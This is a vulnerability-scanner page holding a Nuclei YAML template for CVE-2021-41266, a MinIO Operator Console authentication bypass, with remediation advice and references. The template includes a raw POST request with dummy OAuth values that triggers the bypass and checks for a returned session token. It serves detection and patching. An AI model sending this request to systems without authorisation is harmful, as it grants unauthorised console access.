MinIO Operator Console Authentication Bypass

ID: CVE-2021-41266

Severity: critical

Author: alevsk

Tags: cve2021,cve,minio,min

Description

MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled.

YAML Source

id: CVE-2021-41266

info:
  name: MinIO Operator Console Authentication Bypass
  author: alevsk
  severity: critical
  description: |
    MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled.
  impact: |
    An attacker can bypass authentication and gain unauthorized access to the MinIO Operator Console.
  remediation: 'Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.'
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41266
    - https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36
    - https://github.com/minio/console/pull/1217
    - https://github.com/HimmelAward/Goby_POC
    - https://github.com/StarCrossPortal/scalpel
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-41266
    cwe-id: CWE-306
    epss-score: 0.05383
    epss-percentile: 0.92945
    cpe: cpe:2.3:a:min:minio_console:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: min
    product: minio_console
  tags: cve2021,cve,minio,min

http:
  - raw:
      - |
        POST /api/v1/login/oauth2/auth HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/json

        {"code":"test","state":"test"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "sessionId"

      - type: word
        part: header
        words:
          - "token"

      - type: status
        status:
          - 201
          - 200
        condition: or
# digest: 490a004630440220495bde5c7287fbe098f19d67405057fe267c8cc4f8d93fc2639a7362b2c13c15022076bb87b5a42a83097d53dde91e3ff2e47a9ca18426bdeb4076c93688d99c1570:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-41266.yaml"

View on Github